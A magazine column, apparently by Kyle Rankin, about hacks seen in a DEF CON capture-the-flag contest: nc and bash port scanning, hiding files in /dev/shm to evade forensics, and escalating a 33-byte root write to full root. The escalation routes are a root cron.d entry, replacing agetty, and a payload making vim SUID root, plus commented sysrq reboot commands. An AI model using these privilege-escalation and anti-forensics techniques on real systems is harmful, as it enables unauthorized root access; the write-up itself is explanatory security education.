Hack and / - Some Hacks from DEF CON
Another incredibly useful function of nc is as a port scanner when something more sophisticated isn't around. Just use the -z option to have nc report whether a port is open without sending any data to it, add -v for verbose output, and provide a port range as an argument. So, to scan a host for open ports between 20 and 25 (good for testing for open FTP, SSH, telnet and SMTP services), you would type:
$ nc -zv host.example.org 20-25
nc: connect to host.example.org port 20 (tcp) failed: Connection refused
Connection to host.example.org 21 port [tcp/ftp] succeeded!
Connection to host.example.org 22 port [tcp/ssh] succeeded!
nc: connect to host.example.org port 23 (tcp) failed: Connection refused
nc: connect to host.example.org port 24 (tcp) failed: Connection refused
Connection to host.example.org 25 port [tcp/smtp] succeeded!
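If even nc itself isn't around, bash can fake the same check with its built-in /dev/tcp pseudo-device. The following is a minimal sketch of that idea, not anything from the original column; the one-second timeout and the function name are my own assumptions:

```shell
#!/bin/bash
# Rough stand-in for `nc -z host lo-hi`: try a TCP connect to each port
# in the range and report the ones that accept the connection.
scan_ports() {
  local host=$1 lo=$2 hi=$3 port
  for ((port = lo; port <= hi; port++)); do
    # bash opens a TCP connection when it sees a /dev/tcp redirection
    if timeout 1 bash -c ": </dev/tcp/$host/$port" 2>/dev/null; then
      echo "port $port open"
    fi
  done
}
```

Running `scan_ports host.example.org 20 25` then reports roughly what nc -zv prints above, minus the service names.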
Another interesting point at the competition involved a system in which you could log in; however, a number of directories, including the home directory, were mounted read-only over NFS. This presented an interesting set of limitations. For instance, because the machine was being attacked by multiple teams, each of which could log in as the same user, everyone was kicking everyone else off the machine. This meant every time you wanted to log in, you had to type in the password manually, yet because the home directory was read-only, you couldn't automate the process with SSH keys. It also meant you needed to be creative about where you stored your scripts, as you couldn't write to the home directory your user normally would have used.
For the defender, you can see why mounting sensitive directories read-only over NFS presents a problem for attackers: they can't write to those directories as regular users, and even if they become root, they might have to compromise the NFS server itself to remount the filesystem read-write. As an attacker, you just had to be a bit more creative about where you stored your files.
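On the defensive side, a read-only NFS export is a one-line change. This is a hypothetical /etc/exports entry for illustration only (the path and network are made up), not the competition's actual configuration:

```
# Export /home read-only to the lab network, with root squashed to nobody
/home  10.0.0.0/24(ro,root_squash,sync)
```

The ro option is what blocks writes from clients; root_squash additionally maps a client's root user to an unprivileged one on the server.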
Most command-line users are aware of the /tmp directory on a Linux system. This is a directory to which all users can write, and a special permission, the sticky bit, is set on it so that although anyone can create files there, users can't delete or rename files owned by someone else. When hacking this particular restricted system, you could very well store your scripts in /tmp, but that's the first place other teams would look for your files, and they likely would delete them (bad) or modify them to do something you didn't expect (worse). Luckily, there are at least two other, less-well-known directories on a Linux system that are writable by everyone: /var/tmp and /dev/shm.
The /var/tmp directory serves much the same function as /tmp does in that all users and programs can write to it; however, unlike the /tmp directory, many users are unaware that it exists or forget to look there. Also unlike the /tmp directory, which gets erased when the system reboots, any files you put in /var/tmp persist between reboots.
The /dev/shm directory is also a hacker favorite, and for good reason: it's even less well known among administrators, and it's world-writable. An even better reason for an attacker to use this directory is that its contents are stored in RAM, not on disk, so once the system reboots, the files are gone and ordinary disk forensics can't recover them.
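You can check all three directories for yourself: each should show mode 1777, where the leading 1 is the sticky bit (the trailing t in ls -l output) and 777 means everyone can read, write and enter the directory:

```shell
# Print the octal mode of each world-writable directory; expect 1777.
# The loop skips any directory that doesn't exist on this system.
for d in /tmp /var/tmp /dev/shm; do
  if [ -d "$d" ]; then
    stat -c '%a %n' "$d"
  fi
done
```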
At a particular point in the competition, some smart hackers on the neg9 team discovered a fault in a custom service running as root on one of the competition systems. They were able to turn this flaw into a root exploit that let them write 33 bytes, as root, anywhere on the filesystem they wanted. The tricky part was that if they chose an existing file, it would be truncated and replaced with those 33 bytes.
This presents an interesting problem. If your only root access was the ability to write 33 bytes to a file, how would you convert that into full root access? You might, for instance, write a new file into /etc/cron.d/ that executes an exploit script every minute. What would you do, though, if that didn't work? When you put yourself in an offensive mindset in a restricted environment like that, you end up discovering creative ways to approach a system.
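To make the size constraint concrete, a working cron.d entry really can fit in the budget. The script path below is invented for illustration; the point is just the byte arithmetic:

```shell
# A one-line /etc/cron.d file that runs an attacker's script every
# minute as root -- and still fits in a 33-byte write.
entry='* * * * * root /dev/shm/x
'
printf %s "$entry" | wc -c    # 26 bytes, under the 33-byte limit
```

Cron files in /etc/cron.d use the system crontab format, so the sixth field names the user (root) to run the command as.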
There were a few ways you could exploit this flaw to get full root access. You could, for instance, look in /etc/inittab to see which getty process was set to respawn automatically and then replace the existing getty binary (for instance, /sbin/agetty) with your custom 33 bytes. Then, when getty respawned (which you potentially could force), it would respawn as root, and you'd have your custom code running with root permissions.
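For reference, the relevant /etc/inittab lines look something like this generic example (the terminal, speed and runlevels here are assumptions). The respawn action is what guarantees init re-executes the program, as root, whenever it exits:

```
# /etc/inittab fragment: init restarts agetty on tty1 whenever it dies
1:2345:respawn:/sbin/agetty 38400 tty1
```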
The way the team actually exploited the flaw was to write a short new init script that made vim SUID root. Then, they wrote to a file in /proc that forced the system to reboot, so that their init script would run at boot. With vim SUID root, they could edit root-owned files and do things like change root's password, enable root logins over SSH and, finally, remove the SUID bit from vim. From a defender's point of view, this kind of attack is quite tricky to protect against, and it essentially comes down to basic security practices, such as keeping packages up to date and sandboxing services when possible.
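It's worth seeing how tight that payload budget is. The script below is my guess at what such a payload could look like, not the team's actual code, and the vim path is an assumption; counting bytes shows it lands on the 33-byte limit exactly:

```shell
# Hypothetical 33-byte payload: a script that marks vim SUID root.
payload='#!/bin/sh
chmod u+s /usr/bin/vim
'
printf %s "$payload" | wc -c   # 33 bytes, counting both newlines

# As for the /proc reboot, the magic SysRq trigger is one such knob
# (do NOT run these casually -- the second line reboots immediately):
#   echo 1 > /proc/sys/kernel/sysrq
#   echo b > /proc/sysrq-trigger
```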
All in all, I have to say, I rather enjoyed this different perspective on security. Whether you are a sysadmin who stays on the defensive side or a hacker who thinks in offensive terms, I think both sides can benefit from putting on the other's hat every now and then.
Kyle Rankin is a Systems Architect in the San Francisco Bay Area and the author of a number of books, including The Official Ubuntu Server Book, Knoppix Hacks and Ubuntu Hacks. He is currently the president of the North Bay Linux Users' Group.